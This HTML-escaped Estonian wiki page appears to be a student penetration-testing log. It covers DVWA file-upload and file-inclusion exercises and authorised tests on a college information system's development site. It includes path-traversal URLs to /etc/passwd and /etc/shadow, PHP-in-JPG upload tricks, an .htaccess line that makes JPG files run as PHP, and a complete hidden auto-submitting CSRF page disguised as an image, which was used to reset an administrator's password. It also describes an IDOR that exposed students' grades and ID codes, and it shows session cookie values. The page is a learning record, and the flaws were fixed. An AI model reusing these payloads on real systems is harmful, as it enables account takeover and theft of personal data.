&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filmi&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
&amp;lt;br&amp;gt;Näiteks sellised failid ja kõik ülejäänud oleksid keelatud.&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
